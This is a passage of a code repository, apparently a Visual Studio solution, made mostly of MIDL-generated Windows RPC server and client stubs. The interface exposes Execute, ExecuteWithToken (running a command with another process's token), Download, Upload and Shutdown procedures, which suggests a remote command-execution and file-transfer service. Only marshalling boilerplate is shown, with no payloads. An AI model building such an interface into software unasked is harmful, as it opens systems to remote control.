NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 131 | /* 36 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ 132 | 133 | /* Procedure ExecuteWithToken */ 134 | 135 | /* 38 */ 0x32, /* FC_BIND_PRIMITIVE */ 136 | 0x48, /* Old Flags: */ 137 | /* 40 */ NdrFcLong( 0x0 ), /* 0 */ 138 | /* 44 */ NdrFcShort( 0x1 ), /* 1 */ 139 | /* 46 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ 140 | /* 48 */ NdrFcShort( 0x8 ), /* 8 */ 141 | /* 50 */ NdrFcShort( 0x0 ), /* 0 */ 142 | /* 52 */ 0x43, /* Oi2 Flags: srv must size, clt must size, has ext, */ 143 | 0x3, /* 3 */ 144 | /* 54 */ 0xa, /* 10 */ 145 | 0x1, /* Ext Flags: new corr desc, */ 146 | /* 56 */ NdrFcShort( 0x0 ), /* 0 */ 147 | /* 58 */ NdrFcShort( 0x0 ), /* 0 */ 148 | /* 60 */ NdrFcShort( 0x0 ), /* 0 */ 149 | /* 62 */ 
NdrFcShort( 0x0 ), /* 0 */ 150 | 151 | /* Parameter Command */ 152 | 153 | /* 64 */ NdrFcShort( 0x200b ), /* Flags: must size, must free, in, srv alloc size=8 */ 154 | /* 66 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 155 | /* 68 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ 156 | 157 | /* Parameter ProcessId */ 158 | 159 | /* 70 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ 160 | /* 72 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 161 | /* 74 */ 0x8, /* FC_LONG */ 162 | 0x0, /* 0 */ 163 | 164 | /* Parameter Output */ 165 | 166 | /* 76 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ 167 | /* 78 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 168 | /* 80 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ 169 | 170 | /* Procedure Download */ 171 | 172 | /* 82 */ 0x32, /* FC_BIND_PRIMITIVE */ 173 | 0x48, /* Old Flags: */ 174 | /* 84 */ NdrFcLong( 0x0 ), /* 0 */ 175 | /* 88 */ NdrFcShort( 0x2 ), /* 2 */ 176 | /* 90 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 177 | /* 92 */ NdrFcShort( 0x0 ), /* 0 */ 178 | /* 94 */ NdrFcShort( 0x0 ), /* 0 */ 179 | /* 96 */ 0x43, /* Oi2 Flags: srv must size, clt must size, has ext, */ 180 | 0x2, /* 2 */ 181 | /* 98 */ 0xa, /* 10 */ 182 | 0x1, /* Ext Flags: new corr desc, */ 183 | /* 100 */ NdrFcShort( 0x0 ), /* 0 */ 184 | /* 102 */ NdrFcShort( 0x0 ), /* 0 */ 185 | /* 104 */ NdrFcShort( 0x0 ), /* 0 */ 186 | /* 106 */ NdrFcShort( 0x0 ), /* 0 */ 187 | 188 | /* Parameter Path */ 189 | 190 | /* 108 */ NdrFcShort( 0x200b ), /* Flags: must size, must free, in, srv alloc size=8 */ 191 | /* 110 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 192 | /* 112 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ 193 | 194 | /* Parameter Data */ 195 | 196 | /* 114 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ 197 | /* 116 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 198 | /* 118 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ 199 | 200 | /* Procedure Upload 
*/ 201 | 202 | /* 120 */ 0x32, /* FC_BIND_PRIMITIVE */ 203 | 0x48, /* Old Flags: */ 204 | /* 122 */ NdrFcLong( 0x0 ), /* 0 */ 205 | /* 126 */ NdrFcShort( 0x3 ), /* 3 */ 206 | /* 128 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 207 | /* 130 */ NdrFcShort( 0x0 ), /* 0 */ 208 | /* 132 */ NdrFcShort( 0x0 ), /* 0 */ 209 | /* 134 */ 0x42, /* Oi2 Flags: clt must size, has ext, */ 210 | 0x2, /* 2 */ 211 | /* 136 */ 0xa, /* 10 */ 212 | 0x1, /* Ext Flags: new corr desc, */ 213 | /* 138 */ NdrFcShort( 0x0 ), /* 0 */ 214 | /* 140 */ NdrFcShort( 0x0 ), /* 0 */ 215 | /* 142 */ NdrFcShort( 0x0 ), /* 0 */ 216 | /* 144 */ NdrFcShort( 0x0 ), /* 0 */ 217 | 218 | /* Parameter Path */ 219 | 220 | /* 146 */ NdrFcShort( 0x200b ), /* Flags: must size, must free, in, srv alloc size=8 */ 221 | /* 148 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 222 | /* 150 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ 223 | 224 | /* Parameter Data */ 225 | 226 | /* 152 */ NdrFcShort( 0x200b ), /* Flags: must size, must free, in, srv alloc size=8 */ 227 | /* 154 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 228 | /* 156 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ 229 | 230 | /* Procedure Shutdown */ 231 | 232 | /* 158 */ 0x32, /* FC_BIND_PRIMITIVE */ 233 | 0x48, /* Old Flags: */ 234 | /* 160 */ NdrFcLong( 0x0 ), /* 0 */ 235 | /* 164 */ NdrFcShort( 0x4 ), /* 4 */ 236 | /* 166 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 237 | /* 168 */ NdrFcShort( 0x0 ), /* 0 */ 238 | /* 170 */ NdrFcShort( 0x0 ), /* 0 */ 239 | /* 172 */ 0x40, /* Oi2 Flags: has ext, */ 240 | 0x0, /* 0 */ 241 | /* 174 */ 0xa, /* 10 */ 242 | 0x1, /* Ext Flags: new corr desc, */ 243 | /* 176 */ NdrFcShort( 0x0 ), /* 0 */ 244 | /* 178 */ NdrFcShort( 0x0 ), /* 0 */ 245 | /* 180 */ NdrFcShort( 0x0 ), /* 0 */ 246 | /* 182 */ NdrFcShort( 0x0 ), /* 0 */ 247 | 248 | 0x0 249 | } 250 | }; 251 | 252 | static const RpcServerInterface_MIDL_TYPE_FORMAT_STRING RpcServerInterface__MIDL_TypeFormatString = 253 | { 254 | 0, 255 | { 
256 | NdrFcShort( 0x0 ), /* 0 */ 257 | /* 2 */ 258 | 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ 259 | /* 4 */ NdrFcShort( 0x2 ), /* Offset= 2 (6) */ 260 | /* 6 */ 261 | 0x12, 0x8, /* FC_UP [simple_pointer] */ 262 | /* 8 */ 263 | 0x22, /* FC_C_CSTRING */ 264 | 0x5c, /* FC_PAD */ 265 | 266 | 0x0 267 | } 268 | }; 269 | 270 | static const unsigned short RpcServerInterface_FormatStringOffsetTable[] = 271 | { 272 | 0, 273 | 38, 274 | 82, 275 | 120, 276 | 158 277 | }; 278 | 279 | 280 | static const RPC_DISPATCH_FUNCTION RpcServerInterface_table[] = 281 | { 282 | NdrServerCall2, 283 | NdrServerCall2, 284 | NdrServerCall2, 285 | NdrServerCall2, 286 | NdrServerCall2, 287 | 0 288 | }; 289 | static const RPC_DISPATCH_TABLE RpcServerInterface_v1_0_DispatchTable = 290 | { 291 | 5, 292 | (RPC_DISPATCH_FUNCTION*)RpcServerInterface_table 293 | }; 294 | 295 | 296 | #endif /* defined(_M_AMD64)*/ 297 | 298 | 299 | 300 | /* this ALWAYS GENERATED file contains the RPC server stubs */ 301 | 302 | 303 | /* File created by MIDL compiler version 8.01.0622 */ 304 | /* at Mon Jan 18 21:14:07 2038 305 | */ 306 | /* Compiler settings for RpcServerInterface.idl: 307 | Oicf, W4, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 308 | protocol : all , ms_ext, c_ext, robust 309 | error checks: allocation ref bounds_check enum stub_data 310 | VC __declspec() decoration level: 311 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 312 | DECLSPEC_UUID(), MIDL_INTERFACE() 313 | */ 314 | /* @@MIDL_FILE_HEADING( ) */ 315 | 316 | #if defined(_M_AMD64) 317 | 318 | 319 | 320 | 321 | #if !defined(__RPC_WIN64__) 322 | #error Invalid build platform for this stub. 
323 | #endif 324 | 325 | 326 | #include "ndr64types.h" 327 | #include "pshpack8.h" 328 | 329 | 330 | typedef 331 | struct 332 | { 333 | struct _NDR64_PROC_FORMAT frag1; 334 | } 335 | __midl_frag31_t; 336 | extern const __midl_frag31_t __midl_frag31; 337 | 338 | typedef 339 | struct _NDR64_CONFORMANT_STRING_FORMAT 340 | __midl_frag30_t; 341 | extern const __midl_frag30_t __midl_frag30; 342 | 343 | typedef 344 | struct _NDR64_POINTER_FORMAT 345 | __midl_frag29_t; 346 | extern const __midl_frag29_t __midl_frag29; 347 | 348 | typedef 349 | struct _NDR64_POINTER_FORMAT 350 | __midl_frag28_t; 351 | extern const __midl_frag28_t __midl_frag28; 352 | 353 | typedef 354 | struct 355 | { 356 | struct _NDR64_PROC_FORMAT frag1; 357 | struct _NDR64_PARAM_FORMAT frag2; 358 | struct _NDR64_PARAM_FORMAT frag3; 359 | } 360 | __midl_frag24_t; 361 | extern const __midl_frag24_t __midl_frag24; 362 | 363 | typedef 364 | struct 365 | { 366 | struct _NDR64_PROC_FORMAT frag1; 367 | struct _NDR64_PARAM_FORMAT frag2; 368 | struct _NDR64_PARAM_FORMAT frag3; 369 | } 370 | __midl_frag17_t; 371 | extern const __midl_frag17_t __midl_frag17; 372 | 373 | typedef 374 | NDR64_FORMAT_CHAR 375 | __midl_frag13_t; 376 | extern const __midl_frag13_t __midl_frag13; 377 | 378 | typedef 379 | struct 380 | { 381 | struct _NDR64_PROC_FORMAT frag1; 382 | struct _NDR64_PARAM_FORMAT frag2; 383 | struct _NDR64_PARAM_FORMAT frag3; 384 | struct _NDR64_PARAM_FORMAT frag4; 385 | } 386 | __midl_frag9_t; 387 | extern const __midl_frag9_t __midl_frag9; 388 | 389 | typedef 390 | NDR64_FORMAT_UINT32 391 | __midl_frag1_t; 392 | extern const __midl_frag1_t __midl_frag1; 393 | 394 | static const __midl_frag31_t __midl_frag31 = 395 | { 396 | /* Shutdown */ 397 | { 398 | /* Shutdown */ /* procedure Shutdown */ 399 | (NDR64_UINT32) 66 /* 0x42 */, /* primitive handle */ /* IsIntrepreted */ 400 | (NDR64_UINT32) 0 /* 0x0 */ , /* Stack size */ 401 | (NDR64_UINT32) 0 /* 0x0 */, 402 | (NDR64_UINT32) 0 /* 0x0 */, 403 | (NDR64_UINT16) 0 
/* 0x0 */, 404 | (NDR64_UINT16) 0 /* 0x0 */, 405 | (NDR64_UINT16) 0 /* 0x0 */, 406 | (NDR64_UINT16) 0 /* 0x0 */ 407 | } 408 | }; 409 | 410 | static const __midl_frag30_t __midl_frag30 = 411 | { 412 | /* *CHAR */ 413 | { 414 | /* *CHAR */ 415 | 0x63, /* FC64_CONF_CHAR_STRING */ 416 | { 417 | /* *CHAR */ 418 | 0, 419 | 0, 420 | 0, 421 | 0, 422 | 0, 423 | 0, 424 | 0, 425 | 0 426 | }, 427 | (NDR64_UINT16) 1 /* 0x1 */ 428 | } 429 | }; 430 | 431 | static const __midl_frag29_t __midl_frag29 = 432 | { 433 | /* *CHAR */ 434 | 0x21, /* FC64_UP */ 435 | (NDR64_UINT8) 0 /* 0x0 */, 436 | (NDR64_UINT16) 0 /* 0x0 */, 437 | &__midl_frag30 438 | }; 439 | 440 | static const __midl_frag28_t __midl_frag28 = 441 | { 442 | /* **CHAR */ 443 | 0x20, /* FC64_RP */ 444 | (NDR64_UINT8) 20 /* 0x14 */, 445 | (NDR64_UINT16) 0 /* 0x0 */, 446 | &__midl_frag29 447 | }; 448 | 449 | static const __midl_frag24_t __midl_frag24 = 450 | { 451 | /* Upload */ 452 | { 453 | /* Upload */ /* procedure Upload */ 454 | (NDR64_UINT32) 262210 /* 0x40042 */, /* primitive handle */ /* IsIntrepreted, ClientMustSize */ 455 | (NDR64_UINT32) 16 /* 0x10 */ , /* Stack size */ 456 | (NDR64_UINT32) 0 /* 0x0 */, 457 | (NDR64_UINT32) 0 /* 0x0 */, 458 | (NDR64_UINT16) 0 /* 0x0 */, 459 | (NDR64_UINT16) 0 /* 0x0 */, 460 | (NDR64_UINT16) 2 /* 0x2 */, 461 | (NDR64_UINT16) 0 /* 0x0 */ 462 | }, 463 | { 464 | /* Path */ /* parameter Path */ 465 | &__midl_frag28, 466 | { 467 | /* Path */ 468 | 1, 469 | 1, 470 | 0, 471 | 1, 472 | 0, 473 | 0, 474 | 0, 475 | 0, 476 | 0, 477 | 0, 478 | 0, 479 | 0, 480 | 0, 481 | (NDR64_UINT16) 0 /* 0x0 */, 482 | 1 483 | }, /* MustSize, MustFree, [in], UseCache */ 484 | (NDR64_UINT16) 0 /* 0x0 */, 485 | 0 /* 0x0 */, /* Stack offset */ 486 | }, 487 | { 488 | /* Data */ /* parameter Data */ 489 | &__midl_frag28, 490 | { 491 | /* Data */ 492 | 1, 493 | 1, 494 | 0, 495 | 1, 496 | 0, 497 | 0, 498 | 0, 499 | 0, 500 | 0, 501 | 0, 502 | 0, 503 | 0, 504 | 0, 505 | (NDR64_UINT16) 0 /* 0x0 */, 506 | 1 507 | }, /* 
MustSize, MustFree, [in], UseCache */ 508 | (NDR64_UINT16) 0 /* 0x0 */, 509 | 8 /* 0x8 */, /* Stack offset */ 510 | } 511 | }; 512 | 513 | static const __midl_frag17_t __midl_frag17 = 514 | { 515 | /* Download */ 516 | { 517 | /* Download */ /* procedure Download */ 518 | (NDR64_UINT32) 393282 /* 0x60042 */, /* primitive handle */ /* IsIntrepreted, ServerMustSize, ClientMustSize */ 519 | (NDR64_UINT32) 16 /* 0x10 */ , /* Stack size */ 520 | (NDR64_UINT32) 0 /* 0x0 */, 521 | (NDR64_UINT32) 0 /* 0x0 */, 522 | (NDR64_UINT16) 0 /* 0x0 */, 523 | (NDR64_UINT16) 0 /* 0x0 */, 524 | (NDR64_UINT16) 2 /* 0x2 */, 525 | (NDR64_UINT16) 0 /* 0x0 */ 526 | }, 527 | { 528 | /* Path */ /* parameter Path */ 529 | &__midl_frag28, 530 | { 531 | /* Path */ 532 | 1, 533 | 1, 534 | 0, 535 | 1, 536 | 0, 537 | 0, 538 | 0, 539 | 0, 540 | 0, 541 | 0, 542 | 0, 543 | 0, 544 | 0, 545 | (NDR64_UINT16) 0 /* 0x0 */, 546 | 1 547 | }, /* MustSize, MustFree, [in], UseCache */ 548 | (NDR64_UINT16) 0 /* 0x0 */, 549 | 0 /* 0x0 */, /* Stack offset */ 550 | }, 551 | { 552 | /* Data */ /* parameter Data */ 553 | &__midl_frag28, 554 | { 555 | /* Data */ 556 | 1, 557 | 1, 558 | 0, 559 | 0, 560 | 1, 561 | 0, 562 | 0, 563 | 0, 564 | 0, 565 | 0, 566 | 0, 567 | 0, 568 | 0, 569 | (NDR64_UINT16) 0 /* 0x0 */, 570 | 1 571 | }, /* MustSize, MustFree, [out], UseCache */ 572 | (NDR64_UINT16) 0 /* 0x0 */, 573 | 8 /* 0x8 */, /* Stack offset */ 574 | } 575 | }; 576 | 577 | static const __midl_frag13_t __midl_frag13 = 578 | 0x5 /* FC64_INT32 */; 579 | 580 | static const __midl_frag9_t __midl_frag9 = 581 | { 582 | /* ExecuteWithToken */ 583 | { 584 | /* ExecuteWithToken */ /* procedure ExecuteWithToken */ 585 | (NDR64_UINT32) 393282 /* 0x60042 */, /* primitive handle */ /* IsIntrepreted, ServerMustSize, ClientMustSize */ 586 | (NDR64_UINT32) 24 /* 0x18 */ , /* Stack size */ 587 | (NDR64_UINT32) 8 /* 0x8 */, 588 | (NDR64_UINT32) 0 /* 0x0 */, 589 | (NDR64_UINT16) 0 /* 0x0 */, 590 | (NDR64_UINT16) 0 /* 0x0 */, 591 | 
(NDR64_UINT16) 3 /* 0x3 */, 592 | (NDR64_UINT16) 0 /* 0x0 */ 593 | }, 594 | { 595 | /* Command */ /* parameter Command */ 596 | &__midl_frag28, 597 | { 598 | /* Command */ 599 | 1, 600 | 1, 601 | 0, 602 | 1, 603 | 0, 604 | 0, 605 | 0, 606 | 0, 607 | 0, 608 | 0, 609 | 0, 610 | 0, 611 | 0, 612 | (NDR64_UINT16) 0 /* 0x0 */, 613 | 1 614 | }, /* MustSize, MustFree, [in], UseCache */ 615 | (NDR64_UINT16) 0 /* 0x0 */, 616 | 0 /* 0x0 */, /* Stack offset */ 617 | }, 618 | { 619 | /* ProcessId */ /* parameter ProcessId */ 620 | &__midl_frag13, 621 | { 622 | /* ProcessId */ 623 | 0, 624 | 0, 625 | 0, 626 | 1, 627 | 0, 628 | 0, 629 | 1, 630 | 1, 631 | 0, 632 | 0, 633 | 0, 634 | 0, 635 | 0, 636 | (NDR64_UINT16) 0 /* 0x0 */, 637 | 0 638 | }, /* [in], Basetype, ByValue */ 639 | (NDR64_UINT16) 0 /* 0x0 */, 640 | 8 /* 0x8 */, /* Stack offset */ 641 | }, 642 | { 643 | /* Output */ /* parameter Output */ 644 | &__midl_frag28, 645 | { 646 | /* Output */ 647 | 1, 648 | 1, 649 | 0, 650 | 0, 651 | 1, 652 | 0, 653 | 0, 654 | 0, 655 | 0, 656 | 0, 657 | 0, 658 | 0, 659 | 0, 660 | (NDR64_UINT16) 0 /* 0x0 */, 661 | 1 662 | }, /* MustSize, MustFree, [out], UseCache */ 663 | (NDR64_UINT16) 0 /* 0x0 */, 664 | 16 /* 0x10 */, /* Stack offset */ 665 | } 666 | }; 667 | 668 | static const __midl_frag1_t __midl_frag1 = 669 | (NDR64_UINT32) 0 /* 0x0 */; 670 | 671 | 672 | #include "poppack.h" 673 | 674 | 675 | static const FormatInfoRef RpcServerInterface_Ndr64ProcTable[] = 676 | { 677 | &__midl_frag17, 678 | &__midl_frag9, 679 | &__midl_frag17, 680 | &__midl_frag24, 681 | &__midl_frag31 682 | }; 683 | 684 | 685 | static const MIDL_STUB_DESC RpcServerInterface_StubDesc = 686 | { 687 | (void *)& RpcServerInterface___RpcServerInterface, 688 | MIDL_user_allocate, 689 | MIDL_user_free, 690 | 0, 691 | 0, 692 | 0, 693 | 0, 694 | 0, 695 | RpcServerInterface__MIDL_TypeFormatString.Format, 696 | 1, /* -error bounds_check flag */ 697 | 0x60001, /* Ndr library version */ 698 | 0, 699 | 0x801026e, /* MIDL Version 
8.1.622 */ 700 | 0, 701 | 0, 702 | 0, /* notify & notify_flag routine table */ 703 | 0x2000001, /* MIDL flag */ 704 | 0, /* cs routines */ 705 | (void *)& RpcServerInterface_ServerInfo, /* proxy/server info */ 706 | 0 707 | }; 708 | 709 | static const RPC_DISPATCH_FUNCTION RpcServerInterface_NDR64__table[] = 710 | { 711 | NdrServerCallAll, 712 | NdrServerCallAll, 713 | NdrServerCallAll, 714 | NdrServerCallAll, 715 | NdrServerCallAll, 716 | 0 717 | }; 718 | static const RPC_DISPATCH_TABLE RpcServerInterface_NDR64__v1_0_DispatchTable = 719 | { 720 | 5, 721 | (RPC_DISPATCH_FUNCTION*)RpcServerInterface_NDR64__table 722 | }; 723 | 724 | static const MIDL_SYNTAX_INFO RpcServerInterface_SyntaxInfo [ 2 ] = 725 | { 726 | { 727 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 728 | (RPC_DISPATCH_TABLE*)&RpcServerInterface_v1_0_DispatchTable, 729 | RpcServerInterface__MIDL_ProcFormatString.Format, 730 | RpcServerInterface_FormatStringOffsetTable, 731 | RpcServerInterface__MIDL_TypeFormatString.Format, 732 | 0, 733 | 0, 734 | 0 735 | } 736 | ,{ 737 | {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}}, 738 | (RPC_DISPATCH_TABLE*)&RpcServerInterface_NDR64__v1_0_DispatchTable, 739 | 0 , 740 | (unsigned short *) RpcServerInterface_Ndr64ProcTable, 741 | 0, 742 | 0, 743 | 0, 744 | 0 745 | } 746 | }; 747 | 748 | 749 | static const SERVER_ROUTINE RpcServerInterface_ServerRoutineTable[] = 750 | { 751 | (SERVER_ROUTINE)Execute, 752 | (SERVER_ROUTINE)ExecuteWithToken, 753 | (SERVER_ROUTINE)Download, 754 | (SERVER_ROUTINE)Upload, 755 | (SERVER_ROUTINE)Shutdown 756 | }; 757 | 758 | static const MIDL_SERVER_INFO RpcServerInterface_ServerInfo = 759 | { 760 | &RpcServerInterface_StubDesc, 761 | RpcServerInterface_ServerRoutineTable, 762 | RpcServerInterface__MIDL_ProcFormatString.Format, 763 | (unsigned short *) RpcServerInterface_FormatStringOffsetTable, 764 | 0, 765 | (RPC_SYNTAX_IDENTIFIER*)&_NDR64_RpcTransferSyntax, 766 | 2, 767 | 
(MIDL_SYNTAX_INFO*)RpcServerInterface_SyntaxInfo 768 | }; 769 | #if _MSC_VER >= 1200 770 | #pragma warning(pop) 771 | #endif 772 | 773 | 774 | #endif /* defined(_M_AMD64)*/ 775 | 776 | -------------------------------------------------------------------------------- /RpcServerInterface2/RpcServerInterface2.acf: -------------------------------------------------------------------------------- 1 | // File RpcServerInterface2.acf 2 | [ 3 | // This interface will use an implicit binding handle named hRpcServerInterface2Binding. 4 | implicit_handle(handle_t hRpcServerInterface2Binding) 5 | ] 6 | interface RpcServerInterface2 // The interface is named RpcServerInterface2 7 | { 8 | } 9 | -------------------------------------------------------------------------------- /RpcServerInterface2/RpcServerInterface2.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the definitions for the interfaces */ 4 | 5 | 6 | /* File created by MIDL compiler version 8.01.0622 */ 7 | /* at Mon Jan 18 21:14:07 2038 8 | */ 9 | /* Compiler settings for RpcServerInterface2.idl: 10 | Oicf, W4, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 11 | protocol : all , ms_ext, c_ext, robust 12 | error checks: allocation ref bounds_check enum stub_data 13 | VC __declspec() decoration level: 14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 15 | DECLSPEC_UUID(), MIDL_INTERFACE() 16 | */ 17 | /* @@MIDL_FILE_HEADING( ) */ 18 | 19 | 20 | 21 | /* verify that the version is high enough to compile this file*/ 22 | #ifndef __REQUIRED_RPCNDR_H_VERSION__ 23 | #define __REQUIRED_RPCNDR_H_VERSION__ 500 24 | #endif 25 | 26 | #include "rpc.h" 27 | #include "rpcndr.h" 28 | 29 | #ifndef __RPCNDR_H_VERSION__ 30 | #error this stub requires an updated version of 31 | #endif /* __RPCNDR_H_VERSION__ */ 32 | 33 | 34 | #ifndef __RpcServerInterface2_h__ 35 | #define __RpcServerInterface2_h__ 36 | 37 | #if defined(_MSC_VER) 
&& (_MSC_VER >= 1020) 38 | #pragma once 39 | #endif 40 | 41 | /* Forward Declarations */ 42 | 43 | #ifdef __cplusplus 44 | extern "C"{ 45 | #endif 46 | 47 | 48 | #ifndef __RpcServerInterface2_INTERFACE_DEFINED__ 49 | #define __RpcServerInterface2_INTERFACE_DEFINED__ 50 | 51 | /* interface RpcServerInterface2 */ 52 | /* [implicit_handle][version][uuid] */ 53 | 54 | void Shutdown2( void); 55 | 56 | 57 | extern handle_t hRpcServerInterface2Binding; 58 | 59 | 60 | extern RPC_IF_HANDLE RpcServerInterface2_v1_0_c_ifspec; 61 | extern RPC_IF_HANDLE RpcServerInterface2_v1_0_s_ifspec; 62 | #endif /* __RpcServerInterface2_INTERFACE_DEFINED__ */ 63 | 64 | /* Additional Prototypes for ALL interfaces */ 65 | 66 | /* end of Additional Prototypes */ 67 | 68 | #ifdef __cplusplus 69 | } 70 | #endif 71 | 72 | #endif 73 | 74 | 75 | -------------------------------------------------------------------------------- /RpcServerInterface2/RpcServerInterface2.idl: -------------------------------------------------------------------------------- 1 | // File RpcServerInterface2.idl 2 | 3 | [ 4 | // A unique identifier that distinguishes this interface from other interfaces. 5 | uuid(fa161e81-6e93-4f41-961c-ee9c2e75de18), 6 | 7 | // This is version 1.0 of this interface. 
8 | version(1.0) 9 | ] 10 | interface RpcServerInterface2 // The interface is named RpcServerInterface2 11 | { 12 | void Shutdown2(void); 13 | } 14 | -------------------------------------------------------------------------------- /RpcServerInterface2/RpcServerInterface2.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Debug 10 | x64 11 | 12 | 13 | Release 14 | Win32 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {8558952E-C76B-4976-949F-76A977DA7F8A} 23 | Win32Proj 24 | RpcServerInterface2 25 | 10.0 26 | 27 | 28 | 29 | Utility 30 | MultiByte 31 | v143 32 | 33 | 34 | Utility 35 | MultiByte 36 | v143 37 | 38 | 39 | Utility 40 | MultiByte 41 | v143 42 | 43 | 44 | Utility 45 | MultiByte 46 | v143 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | <_ProjectFileVersion>10.0.40219.1 66 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 67 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 68 | true 69 | true 70 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 71 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 72 | false 73 | false 74 | 75 | 76 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 77 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 78 | 79 | 80 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 81 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 82 | 83 | 84 | 85 | Disabled 86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 87 | true 88 | EnableFastChecks 89 | MultiThreadedDebug 90 | true 91 | true 92 | true 93 | 94 | 95 | Level4 96 | EditAndContinue 97 | 98 | 99 | $(OutDir)RpcServerInterface2.exe 100 | true 101 | $(OutDir)RpcServerInterface2.pdb 102 | Console 103 | MachineX86 104 | 105 | 106 | 4 107 | Ascii 108 | false 109 | %(Filename).h 110 | 111 | 112 | 113 | 114 | Disabled 115 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 116 | EnableFastChecks 117 | 
MultiThreadedDebug 118 | true 119 | true 120 | true 121 | 122 | 123 | Level4 124 | ProgramDatabase 125 | 126 | 127 | $(OutDir)RpcServerInterface2.exe 128 | true 129 | $(OutDir)RpcServerInterface2.pdb 130 | Console 131 | 132 | 133 | 4 134 | Ascii 135 | false 136 | %(Filename).h 137 | 138 | 139 | 140 | 141 | MaxSpeed 142 | OnlyExplicitInline 143 | true 144 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 145 | true 146 | MultiThreaded 147 | true 148 | true 149 | true 150 | true 151 | 152 | 153 | Level4 154 | ProgramDatabase 155 | 156 | 157 | $(OutDir)RpcServerInterface2.exe 158 | true 159 | Console 160 | true 161 | true 162 | MachineX86 163 | 164 | 165 | 4 166 | Ascii 167 | false 168 | %(Filename).h 169 | 170 | 171 | 172 | 173 | MaxSpeed 174 | OnlyExplicitInline 175 | true 176 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 177 | true 178 | MultiThreaded 179 | true 180 | true 181 | true 182 | true 183 | 184 | 185 | Level4 186 | ProgramDatabase 187 | 188 | 189 | $(OutDir)RpcServerInterface2.exe 190 | true 191 | Console 192 | true 193 | true 194 | 195 | 196 | 4 197 | Ascii 198 | false 199 | %(Filename).h 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | -------------------------------------------------------------------------------- /RpcServerInterface2/RpcServerInterface2.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /RpcServerInterface2/RpcServerInterface2_c.c: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the RPC client stubs */ 4 | 5 | 6 | /* File created by MIDL compiler version 8.01.0622 */ 7 | /* at Mon Jan 18 21:14:07 2038 8 | */ 9 | /* Compiler settings for RpcServerInterface2.idl: 10 | Oicf, W4, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 11 | protocol : all , ms_ext, c_ext, robust 12 | error 
checks: allocation ref bounds_check enum stub_data 13 | VC __declspec() decoration level: 14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 15 | DECLSPEC_UUID(), MIDL_INTERFACE() 16 | */ 17 | /* @@MIDL_FILE_HEADING( ) */ 18 | 19 | #if defined(_M_AMD64) 20 | 21 | 22 | #if _MSC_VER >= 1200 23 | #pragma warning(push) 24 | #endif 25 | 26 | #pragma warning( disable: 4211 ) /* redefine extern to static */ 27 | #pragma warning( disable: 4232 ) /* dllimport identity*/ 28 | #pragma warning( disable: 4024 ) /* array to pointer mapping*/ 29 | 30 | #include 31 | 32 | #include "RpcServerInterface2.h" 33 | 34 | #define TYPE_FORMAT_STRING_SIZE 3 35 | #define PROC_FORMAT_STRING_SIZE 27 36 | #define EXPR_FORMAT_STRING_SIZE 1 37 | #define TRANSMIT_AS_TABLE_SIZE 0 38 | #define WIRE_MARSHAL_TABLE_SIZE 0 39 | 40 | typedef struct _RpcServerInterface2_MIDL_TYPE_FORMAT_STRING 41 | { 42 | short Pad; 43 | unsigned char Format[ TYPE_FORMAT_STRING_SIZE ]; 44 | } RpcServerInterface2_MIDL_TYPE_FORMAT_STRING; 45 | 46 | typedef struct 